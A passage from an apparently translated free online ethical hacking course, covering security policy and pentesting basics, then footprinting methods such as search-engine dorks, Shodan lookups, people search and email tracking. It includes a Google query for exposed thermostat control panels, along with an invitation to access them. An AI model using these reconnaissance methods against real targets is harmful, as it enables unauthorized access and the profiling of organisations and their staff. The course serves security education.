cooperation of the IT staff.

Network security zoning

The network security zoning mechanism allows an organization to manage a secure network
environment by selecting the appropriate security levels for different areas of Internet networks
and Intranet. It helps control and control incoming and outgoing traffic effectively.

Common examples of network zones:

 Internet Zone: uncontrolled zone, since it is outside the limits of an organization


 Internet DMZ: controlled zone, as it provides a buffer between internal networks and the
Internet
 Production network zone: restricted zone, since it strictly controls direct access from
uncontrolled networks
 Intranet Zone: controlled area without heavy restrictions
 Management network zone: safe area with strict policies

Information Security Policies

A security policy is a document or set of documents that describes the security controls that must
be implemented in the company at a high level that safeguards the organization's network from
internal and external attacks. This document defines the complete security architecture of an
organization and the document includes clear objectives, goals, rules and regulations, formal
procedures, etc. It clearly mentions the assets that must be protected and the person who can log
in and access the sites, who can see the selected data, as well as the people who can change the
data, etc. Without these policies, it is impossible to protect the company from possible lawsuits,
loss of income, etc.

Security policies are the basis of the security infrastructure. These policies protect the
information resources of an organization and provide legal protection to the organization. These
policies are beneficial because they help to raise awareness among the staff working in the
organization to work together to ensure their communication, as well as to minimize the risks of
security weaknesses through "human factor" errors such as disclosing sensitive information to
non-confidential sources. authorized or unknown, improper use of the Internet, etc. In addition,
these policies provide protection against cyber attacks, malicious threats, foreign intelligence,
etc. They mainly cover physical security, network security, access authorizations, virus
protection and disaster recovery.
The objectives of the security policies include:

 Maintain a scheme for the administration of network security


 Protection of the computer resources of the organization
 Elimination of legal liability of third-party employees
 Guarantee the integrity of the client and avoid the waste of computer resources of the
company
 Avoid unauthorized data modifications
 Reduce the risks caused by the illegal use of system resources and the loss of sensitive
and confidential data
 Differentiate a user's access rights
 Protect confidential and proprietary information from theft, misuse or unauthorized
disclosure.

Classification of Information Security Policies

Security policies are sets of policies that are developed to protect or safeguard information
assets, networks, etc. Of any type of infrastructure. These policies are applicable to users, IT
departments, organization, etc. For effective security management, security policies are classified
into five different areas:

 User Policy: defines what type of user is using the network, defines the limitations that
apply to users to protect the network, for example: password management policy.
 IT Policy: designed for an IT department to keep the network secure and stable, for
example, backup policies, server configuration, patch updates, modification policies,
firewall policies.
 General policies: define responsibility for generic commercial purposes, for example:
high-level program policy, business continuity plans, crisis management, disaster
recovery.
 Partner policy: policy that is defined between a group of partners
 Problem specific policies: recognize specific areas of concern and describe the state of
the organization for high level management. Eg: physical security policy, personnel
security policy, communications security.

Structure and internal content of an Information Security Policy

A security policy is the document that provides the way to protect the physical personnel and the
company's data against security threats or infractions. Security policies should be structured with
great care and should be reviewed properly to ensure that there are no words that someone can
take advantage of. The basic structure of security policies should include the following:

 Detailed description of policy issues


 Description of the state of the policy
 Applicability of the policy to the environment
 Functionalities of those affected by the policy
 Specific consequences that will occur if the policy is not compatible with the standards of
the organization.

Content of Security Policies

Security policies generally contain the following elements:

 High level security requirements: explains the requirements of a system to implement


security policies. The four different types of requirements are discipline, safeguard,
procedure and safety.
* Security requirements of the discipline: this requirement includes various security
policies, such as security of communications, computer security, security of operations,
security of emanations, network security, security of personnel, security of the
information and physical security.
* Safeguarding security requirements: this requirement mainly contains access
control, file, audit, authenticity, availability, confidentiality, cryptography, identification
and authentication, integrity, interfaces, marking, non-repudiation, reuse of objects,
recovery and protection against viruses.
* Procedural security requirements: this requirement mainly contains access
policies, liability rules, plans and documentation of continuity of operations.
* Assurance security: this includes certification and accreditation reviews and
maintenance planning documents used in the assurance process
 Description of policy: focuses on security disciplines, safeguards, procedures, continuity
of operations and documentation. Each subset of this part of the policy describes how the
system architecture will apply security.
 Safety concept: mainly defines the roles, responsibilities and functions of a safety policy.
It focuses on the mission, communications, encryption, user and maintenance rules,
management of downtime. use of proprietary versus public domain software, shareware
software rules and a virus protection policy.
 Assignment of security application to architecture elements: provides an architecture
assignment of the computer system to each system of the program.

Types of Security Policies

We know that policies help maintain the confidentiality, availability and integrity of information,
now we will look at the four main types of security policies:

1. With a primitive policy: there are no restrictions on Internet access. A user can access
any site, download any application and access a computer or network from a remote
location, while this can be useful in corporate companies where people traveling or
working in branches need access to organizational networks, many malicious programs ,
the threats of viruses and Trojans are present on the Internet. Due to free Internet access,
this malware can come as attachments without the user's knowledge. Network
administrators should be extremely alert if this type of policy is chosen.
2. Permissive policy: In a permissive policy, most Internet traffic is accepted, but several
known dangerous services and attacks are blocked. Because only known attacks and
exploits are blocked, it is impossible for administrators to keep up with current exploits.
Administrators always play by catching up with attacks and exploits.
3. A prudent policy: starts with all the blocked services, the administrator enables safe and
necessary services individually, this provides maximum security. Everything, like the
system and the network activities, are recorded.
4. In a paranoid policy: everything is prohibited, there is a strict restriction on the use of
the company's computers, whether it is the use of the system or the use of the network.
There is no Internet connection or severely limited Internet use. Because of these over-
served restrictions, users often try to find ways to avoid them using VPN for example.

Examples of cotiadian use of Security Policies

 Access control policy: defines the resources that are protected and the rules that control
access to them
 Remote Access Policy: defines who can have remote access and defines the means of
access and remote access security controls
 Firewall management policy: defines the access, management and control of firewalls
in the organization.
 Network connection policy: defines who can install new resources in the network,
approve the installation of new devices, document changes in the network, etc.
 Password Policy: Provides guidelines for using secure password protection in the
organization's resources
 User account policy: defines the process of creating the account, and the authority, rights
and responsibilities of user accounts
 Information protection policy: defines the sensitivity levels of information, who can
access it, how it is stored and transmitted, and how it should be removed from storage
media
 Special Access Policy: this policy defines the terms and conditions for granting special
access to system resources
 Email security policy: was created to control the correct use of corporate email
 Acceptable Use Policy: defines the acceptable use of system resources

Steps to create and implement a Security Policy

The implementation of security policies reduces the risk of being attacked. Therefore, each
company must have its own security policies based on its business. The following are the steps
that each organization must follow to create and implement security policies

1. Carry out a risk assessment to identify the risks of the assets of the organization
2. Learn from the standard guidelines of other organizations
3. Include senior management and all other staff in the development of policies
4. Establish clear sanctions and enforce them, and also review and update the security
policy
5. Make the final version available to all staff in the organization
6. Make sure that each member of your staff reads, signs and understands the policy
7. Install the tools you need to enforce the policy
8. Train your employees and educate them about the policy

Privacy policies in the workplace

Employers will have access to personal information of employees that may be confidential and
that they wish to keep private, that is why privacy policies were created to protect the private
information of each employee that is part of a company.

Basic rules for privacy policies in the workplace:

 Beware of private information that you collect and store from your employees, why do
you do it? and what will you do with the information ?.
 Limit the collection of information and obtain it by fair and legal means
 Inform employees about the possible collection, use and disclosure of personal
information
 Keep personal information of employees accurate, complete and with updated data
 Provide employees with access to their personal information
 Keep employees' personal information secure, not letting any employee see private
information about another employee.

Involvement of Human Resources and Legal departments in the application of information


security policies.

The Human Resources department and its involvement:

 Is responsible for informing employees about security policies and training them on the
best practices defined in the policy.
 Work with the administration to monitor the implementation of policies and address any
problem of policy violation

The legal department and its implication:

 Business information policies must be developed in consultation with legal experts and
must comply with relevant local laws.
 The application of a security policy that may violate the rights of users and employees of
the company in contravention of local laws may lead to lawsuits against the organization

Physical security
Physical security is the first layer of protection in any organization
It implies the protection of the assets of the organization against environmental and man-made
threats.

Why physical security?


To avoid any unauthorized access to system resources, to avoid manipulation / theft of data from
computer systems, to protect against espionage, sabotage, damage or theft, to protect personnel
and prevent social engineering attacks.

Threats to Physical Security

Environmental threats:

 Floods
 Fires
 Tremors
 Dust

Threats produced by humans:

 Terrorism
 Wars
 Explosion
 Diving and theft container
 Vandalism

Physical Security Controls

 Locations and environment of the company: fences, doors, walls, protections, alarms,
CCTV cameras, intrusion systems, panic buttons, burglar alarms, windows and door bars,
interlocks, etc.
 Reception area: blocks important files and locks the computer when it is not in use
 Server area and workstation: block systems when they are not in use, disable or avoid
having removable media and DVD-ROM drives, CCTV cameras, workstation design
 Other equipment such as fax, modern and removable media: block fax machines
when they are not in use, archive correctly obtained faxes, disable the automatic response
mode for modems, do not place elimination means in public places and physically
destroy the damaged disposal media
 Access control: separate work areas, implement biometric access controls (fingerprints,
retinal scanning, iris scanning, vein structure recognition, face recognition, speech
recognition), entry cards, traps for men, faculty login procedures, identification badges,
etc.
 Maintenance of computer equipment: designate a person to be in charge of the
maintenance of the computer equipment
 Cabling: inspect all cables that routinely transport data, protect cables with shielded
cables, never leave any cables exposed
 Environmental control: humidity and air conditioning, HVAC, fire suppression, EMI
shielding and cold and hot aisles.

Incident Management Response

Incident management is the process of recording and resolving incidents that take place in the
organization. The incident may occur due to a failure, service degradation, error, etc. The
incidents are reported by users, technical staff, or are sometimes detected automatically by the
event monitoring tools. The main objective of the incident management process is to restore the
service to a normal stage as soon as possible to the customers, while maintaining the availability
and quality of the service. Any occurrence of the incident in an organization is handled and
resolved.

Incident Management Process:

1. Preparing for incident management and response


2. Detection and analysis
3. Classification and prioritization
4. Notification
5. Containment
6. Forensic investigation
7. Eradication and recovery
8. Post-incident activities

Responsibilities of an Incident Management Team

1. Manage security issues by adopting a proactive approach to client security vulnerabilities


and responding effectively to possible information security incidents
2. Develop or review the processes and procedures that must be followed in response to an
incident
3. Manage the response to an incident and ensure that all procedures are followed correctly
to minimize and control the damage
4. Identify and analyze what happened during an incident, including the impact and threat
5. Provide a single point of contact to report incidents and security problems
6. Review changes in legal and regulatory requirements to ensure that all processes and
procedures are valid
7. Review existing controls and recommend steps and technologies to prevent future
security incidents
8. Establish a relationship with the local law enforcement agency, government agencies, key
partners and suppliers.
Vulnerability Assessment

Vulnerability assessment is a test of the ability of a system or application, including current


procedures and controls to withstand a computer attack. Recognizes, measures and classifies
security vulnerabilities in a computer system, network and communication channels.

A vulnerability assessment can be used for:

 Identify weaknesses that could be exploited


 Predict the effectiveness of additional security measures to protect information resources
from attack

Types of Vulnerability Assessments

 Active evaluation: use a network scanner to find hosts, services and vulnerabilities.
 Passive evaluation: technique used to sniff network traffic to discover active systems,
network services, applications and vulnerabilities present.
 Host-based evaluation: determines vulnerabilities in a specific workstation or server.
 Internal evaluation: a technique to scan the internal infrastructure to discover exploits
and vulnerabilities.
 External evaluation: evaluates the network from a hacker's point of view to discover
which vulnerabilities and vulnerabilities are accessible to the outside world.
 Application Evaluations: Test the web infrastructure to detect any erroneous
configuration and known vulnerabilities.
 Network evaluation: determines the possible network security attacks that may occur in
the organization's system.
 Wireless network assessments: determines the vulnerabilities in the wireless networks
of the organization.

Vulnerability assessment methodology

Phase 1 - Acquisition

 Review laws and procedures related to vulnerability assessment of the network


 Identify and review documents related to network security
 Review the list of vulnerabilities previously discovered

Phase 2 - Identification

 Conduct interviews with clients and employees involved in the design and administration
of the system architecture
 Collect technical information about all network components
 Identify the different industry standards that the network security system meets

Phase 3 - Analyzing

 Review interviews
 Analyze the results of previous vulnerability assessments
 Analyze security vulnerabilities and identify risks
 Perform threat and risk analysis
 Analyze the effectiveness of existing security controls
 Analyze the effectiveness of existing security policies

Phase 4 - Evaluation

 Determine the probability of exploitation of the identified vulnerabilities


 Identify the gaps between existing security measures and those required
 Determine the controls needed to mitigate the identified vulnerabilities
 Identify the required updates for the vulnerability assessment process of the network

Phase 5 - Generation of reports

 The result of the analysis must be presented in a draft report to be evaluated for additional
variations
 The report must contain:
* Task performed by each team member
* Methods used and findings
* General and specific recommendations
* Terms used and their definitions
* Information collected from all phases
 All documents must be stored in a central database to generate the final report

Vulnerability Research

Vulnerability research means discovering flaws and weaknesses in system design that could help
attackers compromise the system. Once the attacker discovers the vulnerability in the product or
application, try to exploit it.

The search for vulnerabilities helps both security administrators and attackers:

 Discover flaws and weaknesses in system design that could help attackers compromise
the system
 Keep abreast of the latest products compatible with suppliers and other technologies to
find news related to the current exploit.
 Checking the recently launched alert about relevant innovations and impromptu products
for security systems
 The investigation of the vulnerability is based on the following classification:
* Level of severity (low, medium or high)
* Operating range (local or remote)

An ethical hacker needs to conduct a vulnerability investigation:

 To collect information about security trends, threats and attacks


 To find weak points and alert the network administrator before a network attack
 To obtain information that helps prevent security problems
 To know how to recover from a network attack

Websites of interest:

 https://www.exploit-db.com/
 https://www.securityfocus.com/
 https://www.cvedetails.com/
 https://www.infosecurity-magazine.com/
 https://www.google.com/

Pentesting

Penetration tests are a method to evaluate the security levels of a particular system or network,
this helps you determine the defects related to hardware and software. Early identification helps
protect the network. If the vulnerabilities are not identified before, they become an easy source
of attack for the intruder.

During the penetration tests, a pentester analyzes all the security measures used by the
organization to detect weaknesses in the design, technical failures and vulnerabilities.

Types of Pentesting

There are 3 types of tests:

1. black box tests: the black box tests simulate an attack by someone who is not familiar
with the system.
2. white box tests: simulate an attacker who has a lot of knowledge about the system.
3. Gray box tests: simulate an attack with limited access to the target system.
Once the tests are done, the pentester prepares a successful attack and its respective
countermeasures that can be applied to prevent a malicious hacker from reproducing the same
attack. Finally, the pentester delivers the report to executive, managerial and technical audiences.

Important points of why Pentesting is necessary:

 Identify the threats that an organization's information assets face


 Reduce the cost of an organization in IT security and improve investment in return
security (ROSI) by identifying and correcting vulnerabilities or weaknesses.
 Provide security with a comprehensive assessment of the security of the organization,
including policy, procedure, design and implementation.
 Obtain a certification to maintain an industry regulation
 Adopt best practices in accordance with legal and industry regulations
 To test and validate the effectiveness of security protections and controls
 To change or update the existing infrastructure of software, hardware or network design
 Focus on high-severity vulnerabilities and emphasize application-level security issues for
development teams and management
 Provide a comprehensive approach to the preparation steps that can be taken to prevent
the next exploitation
 Evaluate the effectiveness of network security devices such as firewalls, routers and web
servers.

Methodologies to perform a good Pentesting

As a pentester, you should never overlook any information resource. All possible sources of
information should be tested for vulnerabilities, not only sources of information, but all the
mechanisms and software involved in your business should be tested, because if the attacker can
not endanger the information system. Then he or she can try to gain access to the system and
then to confidential information. Some attacks, such as denial of service attacks, do not even
need access to the system. Therefore, to be sure to verify all possible ways to compromise a
system or network, you must follow the penetration test methodology. This ensures the full scope
of the test.

Examples of some methodologies for Pentesting:

1. OWASP: the open web application security project is an open source application security
project that helps organizations buy, develop and maintain software tools , software
applications and knowledge-based documentation for the security of web and mobile
applications.
2. OSSTMM: open source security testing methodology, is a peer-reviewed methodology
for performing high quality security tests as methodology tests: data, levels of fraud
control and social engineering, computer networks, wireless devices, mobile devices,
physical security access controls and various security processes.
3. ISSAF: framework for evaluating the security of information systems, is an open source
project aimed at providing security assistance to professionals. The mission of ISSAF is
"* to investigate, develop, publish and promote a complete and practical framework of
security assessment of generally accepted information systems *".

** Comparison between: Security Audit, Vulnerability Assessment and Pentesting. What


differences do they have between each other? **

Security audit: a security audit only verifies if the organization follows a set of security policies
and procedures based on an industry security standard.

Vulnerability assessment: a vulnerability assessment focuses on discovering vulnerabilities in


the information system, but does not provide any indication of whether vulnerabilities can be
exploited or the amount of harm that can result from the successful exploitation of the
vulnerability. vulnerability.

Pentesting: is a methodological approach to security assessment that covers security auditing


and vulnerability assessment and demonstrates whether vulnerabilities in the system can be
exploited successfully by attackers, in others words does everything the same as a hacker
demonstrating how security can be breached and enter the system, but legally and for security
purposes.

Phases of penetration tests

Phase prior to attack:

 Planning and preparation


 Methodology design
 Gathering network information

Attack phase:

 Penetrating perimeter
 Obtaining objective
 Scaled Privileges
 Execution, implantation, retraction

Post-attack phase:

 Reports
 Clean
 Destruction of artifacts
Blue team vs Red team

Blue Team:

 An approach in which a set of security responders performs analysis of an information


system to evaluate the adequacy and efficiency of their security controls.
 The blue team has access to all resources and information of the organization
 The main function is to detect and mitigate the activities of the red team (attackers) and
anticipate how surprise attacks could occur.

Red Team:

 An approach in which a team of ethical hackers performs a penetration test in an


information system without access, or with very limited access, to the internal resources
of the organization.
 Can be done with or without warning
 It is proposed to detect vulnerabilities in networks and systems, and verify security from
the perspective perspective of an attacker to the network, the system or access to
information.

This module ends here, I hope you have been able to learn the objectives of this module. This
course has an effort and it is free, I would like you to share it in your social networks or hacking
forums so that more people see it, this course will advance until you reach 20 modules at least
and will be more advanced, you can subscribe if you want to know the advanced the course,
every 7 days sent an email informing everything that happens in the blog.

en.gburu.net

 Home
 Courses
 FREE $10 in DigitalOcean
 about
 contact
 gburu.net

Subscribe
27 January 2018
Ethical Hacking Course - Module 2 -
Objective recognition
Ethical Hacking Course, Computer Security

Surely you have already finished module 1 - introduction to ethical hacking, in module 2 -
recognition of the objective, of the course of computer security. We will see everything about the
recognition of potential objectives.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This ethical hacking course is aimed at educational purposes to improve your computer security
skills to plan and design safer networks, does not encourage illegal activities in systems or
networks of third parties, if you commit an illicit activity in a system or network. You will do at
your own risk. If you want to practice and improve your skills in ethical hacking, do it under
systems where you have a legal permit or are yours, I recommend using images of operating
systems installed in virtual machines in a controlled environment.

Agenda: Module 2 - Objective Recognition

 Objectives of module 2
 What is Footprinting?
 Why is Footprinting necessary?
 Footprinting Objectives
 Footprinting Methodology
 Footprinting with search engines
o Find thermostat control panels with Google
 Find the external and internal URLs of the organization
 Determine the Target Operating System
 Target location
 Search for people: social networking sites / people search services
 Goal Finance information
 Recognition with a website
o Interesting tools
o Browse HTML source code and Cookies
o Web spiders
o Duplication of a website
o E-Mail Recognition
o Tracking of email communications
o Tracking of email communications
 Collect information through Competitive Intelligence
o Competitive intelligence: when did this company start? How did it develop?
o Traffic monitoring of target company website
o Tracking target's online reputation
 Recognition: Advanced Google Hacking Techniques
o What can a hacker do with Google?
 Recognition: WHOIS Databases
 Recognition: Collect DNS information
 Recognition: Locate range of the Network
o Map Network route
 Recognition: Get information through Social Engineering
o Common Social Engineering Techniques
 Important tools for goal recognition
 Countermeasures to Recognition

Objectives module 2
It is expected that by completing this module 2 of the computer security course, you can learn in
depth the following:

 Understand the concepts of Recognition


 Recognition through the search engines
 Recognition using advanced google hacking techniques
 Recognition through social networking sites
 Understand the different techniques for Recognition of a website
 Understand the different competitive intelligence techniques
 Understand the different techniques for WHOIS Recognition
 Understand the different techniques for DNS Recognition
 Understand the different techniques for Recognition in a network
 Understand the different techniques of Recognition through social engineering
 Countermeasures for the Recognition

Ethical hacking is a process where a person with the legal permission of the organization
analyzes and attacks as a malicious hacker would against a computer network, these people are
called "pentesters". Ethical hacking has several phases. One of them is the first one called
"Footprinting". It is about making a general recognition of the potential objective to be audited.
The more valuable information is collected by the pentester, the more likely it is to attack. is
carried out successfully, that is why it is a very important phase prior to the attack, and in this
module of the computer security course we will see more details of this phase of hacking.

What is Footprinting?
Footprinting, is the first step of ethical hacking, refers to the process of gathering information
about a target network and its environment. By using footprinting, you can find several ways to
filter into the network system of the target organization. It is considered "methodological"
because it seeks critical information based on a previous discovery.

Once you start the process of footprinting methodologically, you will get the plan of the security
profile of the target organization. Here the term "blueprint" is used because the result obtained at
the end of footprinting refers to the unique system profile of the target organization.

There is no single methodology for footprinting, as it can track information on several routes.
However, this activity is important since all the crucial information must be gathered before
starting to hack. Therefore, you must perform the footprinting in a precise and organized manner.

Why is recognition necessary?

In order for attackers or pentesters to create an attack strategy, they need to gather information
about the network of the target organization, so that they can find the easiest way to enter the
security perimeter of the organization. As mentioned above, the trace is the easiest way to gather
information about the target organization, this plays a vital role in the hacking process.

The recognition of the target network, can offer us different amounts of information related to
our objective, among them there are 4 important:

1. Know the security posture: the recognition allows the attackers to know the external
security posture of the target organization.
2. Reduces the focus area: reduces the focus area of the attacker to a specific range of IP
addresses, networks, domain names, remote access, etc.
3. Identify vulnerabilities: allows the attacker to identify vulnerabilities in the target
systems to select appropriate exploits.
4. Map network map: allows attackers to draw a map or sketch the network infrastructure
of the target organization to know the real environment they are going to hack.

Objectives of the Recognition

The main objectives of the recognition include gathering the network information of the
objective, the information of the system and the information of the organization. When you
perform footprinting at various network levels, you can obtain information such as: network
blocks, network services and applications, system architecture, intrusion detection systems,
specific IP addresses and access control mechanisms. With the fingerprint, information is also
obtained from potential employees.

1. Collect information from the target network:


o Domain names
o Name of internal domains of the organization
o Network blocks
o IP addresses of all systems that can be reached
o Restricted or private websites, intranets.
o Services running over TCP or UDP
o Controls of access mechanisms, or ACLs
o Network protocols
o VPN points
o Possible IDS monitoring the network
o Digital and analog phone numbers
o Authentication mechanisms
o Enumeration of systems
2. Collect system information:
o Names of user groups
o System Banners (Banner Grabbing)
o Routing tables
o Information about SNMP
o Operating system architecture
o Remote system type
o Names of systems
o Badly taken care of passwords
3. Collect information about the organization:
o Information about employees
o Website of the Organization
o Directory of the organization
o Information about your location
o Phone numbers
o Comments in the HTML code
o Security Policies that implemented
o News about the organization
o Relevant links on the website

Footprinting Methodology

The footprint methodology is a procedural way of gathering information about an objective


organization from all available sources. It involves collecting information about a target
organization, determining the URL, the location, the establishment details, the number of
employees, the specific number of domain names and contact information. This information can
be collected from various sources, such as search engines, WHOIS databases, etc.

Search engines are the main sources of public information where you can find valuable
information about your target organization. Therefore, we will first discuss the footprint through
the search engines. Here we will discuss how and what information we can collect through the
search engines (Google, Yahoo !, Bing, etc).

Footprinting: search engines


A web search engine is designed to search for information on the WWW. Search results are
usually presented in a line of results often referred to as search engine result pages (SERP) in
today's world, many search engines allow you to extract information from a target organization,
such as technology platforms, details of employees, login pages, intranet portals, and so on. With
this information, an attacker can build an attack strategy to enter the network of the target
organization and can carry out other types of advanced system attacks. A search on Google could
reveal postings to forums by security personnel that reveal brands of firewalls or antivirus
software in use on the target. Sometimes, there are even network diagrams that can guide an
attack.

As an ethical hacker, if you find confidential information about your company on the search
engine results pages, you should delete that information. Even if you delete confidential
information, it may still be available in a search engine cache. Therefore, you should also check
the search engine cache to make sure that confidential data is permanently deleted.

Find thermostat control panels with Google

If you do not believe the potential for damage that search engines can generate for an
organization, look at this search parameter for Google:
intitle:"Status & Control" + "Thermostat Status" +"HVAC Settings" +"Zone
Temperature"

Just copy and paste to Google and get access to control thermostats, most likely from
organizations, and you are also very likely to suffer from misconfiguration vulnerabilities, that
is, removed from your base box and connected it to the nearest router with everything by default,
to use it without paying attention to its configuration, much less apply a little security. In the
practice of this module we will see more of these attacks.

This search parameter was written by: Ankit Anubhav NewSky Security. (Know more).

Find the external and internal URLs of the organization

The external and internal URLs of a company provide a lot of useful information to the attacker.
These URLs describe the company and provide details such as the mission and vision of the
company, the products or services offered, etc. The URL that is used outside the corporate
network to access the vault server of the company through a firewall is called external URL. It is
linked directly to the external website of the company. The external URL of the target company
can be determined with the help of search engines such as Google or Bing.

If you want to find the external URL of an organization, follow these steps:
1. Open any of the search engines, such as Google or Bing.
2. Enter the name of the target company in the search box and press Enter.

The internal URL is used to access the vault server of the company directly within the corporate
network. The internal URL helps to access the internal functions of a company. Most companies
use common formats for internal URLs. Therefore, if you know the external URL of a company,
you can predict an internal URL by trial and error. These internal URLs provide information
about different departments and business units in an organization. You can also find the internal
URL of an organization using tools such as netcraft.

Tool to search internal URLs:

1. Netcraft: the most popular one, deals with web server, analysis of market share of web
hosting and detection of operating system. It provides a free anti-phishing toolbar, checks
the risk rate and the location of the server where the websites we visit are hosted.

Determine the Target Operating System

There are many ways to determine an operating system that in practice we will see, but if you
want to do it quickly and online you can try Netcraft or Shodan.

Netcraft is used to determine the operating system of the server that gave us an answer, example
(vulnweb.com):

Now we know that it is working on Linux and with Nginx 1.4.1.

https://www.shodan.io/host/176.28.50.165
also fulfills a similar function but adds more things such as all open ports and services used by
the target:

Collect information on target location

In this step you have to be careful, if you found any address of the company you can look it up in
the maps to have an idea of the visual environment and how is the company on the outside, but,
if you rely on the information of the physical location of the Server IP would tell you not to try to
locate it on the maps because it is very likely that the company's engineers hosted the server in a
hosting company or directly in the cloud, and therefore the location will be from the company
data center where they stored their application, which is feasible to be thousands of kilometers
from the actual location of the company.

Useful tools to visualize the location:


 Wikimapia
 Google Maps
 Bing Maps
 Yahoo Maps
 OpenStreetMap
 Yandex Maps

People search: social networking sites, people search services

Social networking sites are the great source of personal and organizational information,
information about an individual can be found on various people search websites, the search of
people usually returns the following information about a person or organization:

 Residential addresses and email addresses


 Contact numbers and date of birth
 Photos and profiles of social networks
 Blog URL
 Satellite images of private residences
 Next projects and operating environment

Interesting services:

1. PeopleSmart
2. Facebook Finder
3. Google

Get finance and employment information

Financial services offer valuable information about large companies such as small startups that
you may have to audit, you will find: market cap of the company, company actions, company
profile, information about your competition, etc.

Interesting services:

1. Google Finance
2. Yahoo! Finance

The jobs that companies require demonstrate the structuring and possibly the technologies they
use in their infrastructure, you can research in the jobs pages as well.

Website Recognition
It is possible for an attacker to build a detailed map of the structure and architecture of a website
without activating the IDS or without raising suspicion of the system administrator. It can be
achieved with the help of sophisticated footprinting tools or simply with the basic tools that
come with the operating system, such as Telnet and a browser.

With online tools you can collect information about the website such as IP address, registered
name and address of the domain owner, domain name, host of the site, details of the operating
system, etc. But this tool may not provide all these details for each site. In such cases, you must
navigate through the destination website.

Navigation through the destination website will provide you with the following information:

 Software used and its version: you can find not only the software in use but also the
version easily on the website based on standard software, you can also find a CMS
behind it.
 Operating system used: generally the operating system can also be determined
 Sub-directories and parameters: can reveal the subdirectories and parameters by
making a note of all the URLs while browsing the destination website.
 File name, path, database field name or query: you must scan everything after a query
that looks like a file name, path, field name of the database or query to verify if it offers
opportunities for SQL injection.
 Scripting Platform: with the help of script file name extensions such as .php, .asp, .jsp,
etc. You can easily determine the script platform used by the target website.
 Contact details and CMS details: contact pages generally provide details such as
names, phone numbers, email addresses and locations of administrators or support
persons. You can use these details to perform a social engineering attack.

Tools of interest:

1. Burp Suite Scanner


2. Wappalyzer
3. ZAP Proxy
4. Firebug

Browse the source code in HTML and Cookies

The source code of HTML is a valuable resource that we have available in public, we have to
take advantage of it, there may be valuable information such as: information from the
programmer, types of libraries that the website calls, forgotten comments that reveal interesting
things, internal structuring of the site, etc.

We can also search our cookies stored in our browser to find software that uses the objective, or
in its cookies policy.
Use web spiders

Web spiders perform automated searches on the destination website and collect specific
information, such as names of employees, email addresses, etc.

Attackers use the information gathered to make more traces and social engineering attacks

Tools:

1. GSA Email Spider


2. Web Data Extractor

Mirroring of the website

The creation of a complete website in the local system allows attackers to navigate through a
website without connection, it also helps to find the structure of the directory and other valuable
information of the duplicate copy without multiple requests to the web server. Web duplication
tools allow you to download a website to download a website to a local directory, recursively
creating all directories, HTML, images, flash, videos and other files from the server to your
computer.

Tools:

1. HTTrack Website Copier


2. Offline browser SurfOffline
3. BlackWidow

Acknowledgment of Emails

Tracking of email communications

Email tracking is a method that helps you monitor and track the emails of a particular user. This
type of tracking is possible through records with digital time stamp to reveal the time and data in
which the destination received or opened a particular email. Many email tracking tools are
available in the market, with which you can collect information such as IP addresses, mail
servers and service provider from which the email was sent.

Through the use of tracking tools you can collect the following information about the
victim:
 Geolocation: estimated and shows the location of the recipient on the map and can even
calculate the distance from your location.
 Duration of reading: the length of time the recipient spends reading the email sent by
the sender.
 Proxy detection: provides information about the type of server used by the recipient.
 Links: allows you to verify if the links sent to the recipient through the email have been
reviewed or not.
 Operating System: this reveals information about the type of operating system used by
the recipient. The attacker can use this information to launch an attack by finding gaps in
that particular operating system.
 Forwarding email: the use of this tool can easily determine if the sender of the email
sent to you or does not send it to another person.

Interesting tools:

1. G-Lock Analytics
2. Yesware
3. Trace-Email
4. Zendio

Get information from headers

An email header is the information that travels with each email. It contains the details of the
sender, the routing information, the data, the subject and the recipient. The process of viewing
the email header varies with the different email programs.

The email header usually contains the following:

 Sender's mail server


 Data and time received by the originator's email servers
 Authentication system used by the sender's mail server
 Data and time of the message sent
 Full name of the sender
 Sender's IP address
 The address from which the message was sent

The attacker can trace and collect all this information by performing a detailed analysis of the
full email header.

Recognition: competitive intelligence


Several tools are available in the market for competitive intelligence gathering purposes.

The acquisition of information about products, competitors and technologies of a company that
uses the Internet is defined as competitive intelligence. Competitive intelligence is not fair about
analyzing competitors but also analyzing their products, customers, suppliers, etc. That impacts
the organization. It is non-interfering and subtle in nature compared to the direct theft of
intellectual property carried out through hacking or industrial espionage. It focuses mainly on the
external business environment. It collects information ethically and legally instead of secretly
compiling it. According to CI professionals, if the intelligence information collected is not
useful, then it is not called intelligence.

Competitive intelligence is done to determine:

1. What competitors are doing


2. How competitors are positioning their products and services
3. Sources of competitive intelligence:
4. Business websites and job advertisements
5. Search engines, Internet and online databases
6. Press releases and annual reports
7. Commercial magazines, conferences and newsletter
8. Patents and trademarks
9. Social engineering employees
10. Product catalogs and points of sale
11. Analyst and regulatory reports
12. Interviews with clients and suppliers

Competitive intelligence can be carried out by employing people to search for information or
using a commercial data service, which implies a lower cost than employing personnel to do the
same.

Competitive intelligence: when did this company start? How did it develop?

Collecting documents and records of competition helps improve productivity and profitability,
and stimulates growth. Help determine the answers to the following:

 When did it start?: through competitive intelligence, the history of a company can be
gathered, as when a particular company was established. Sometimes, you can also gather
crucial information that is generally not available to others.
 How was it developed?: It is very beneficial to know exactly how a particular company
developed. What are the different strategies used by compnay? Your advertising policy,
customer relationship management, etc. You can learn
 Who directs it?: this information helps a company to know the details of the leader
(responsible for making decisions) of the company.
 Where is it?: the location of the company and the information related to the various
branches and their operations can be collected through competitive intelligence.
You can use this information collected through competitive intelligence to build a hacking
strategy. The following are information resource sites that help users obtain competitive
intelligence:

1. EDGAR: all companies (USA), must submit registration statements, periodic reports and
other forms electronically through EDGAR .
2. Hoovers: is a commercial research company that provides complete details about
companies and industries around the world. Hoovers provides patented information
related to the business through the Internet, data feeds, wireless devices and co-branding
agreements with other online services.

Traffic monitoring of the target company's website

The attacker uses tools to track website traffic, such as web-stat, Alexa, Monitis, etc. To gather
information about the target company.

Information you get:

 Total visitors
 Page views
 Bounce Rate
 Live visitor map
 Ranking of the site

Traffic monitoring helps gather information about the target's client base that helps attackers
disguise themselves as a customer and launch social engineering attacks against the target.

Tools:

1. Alexa

Track target's online reputation

Online reputation management (ORM) is a process of monitoring the reputation of a company on


the Internet and adopting certain measures to minimize negative search results and thus improve
the reputation of the brand.

An attacker uses the ORM tracking tools to:

 Follow the company's online reputation


 Collect search engine ranking information from the company
 Get email notifications when a company is mentioned online
 Follow conversations
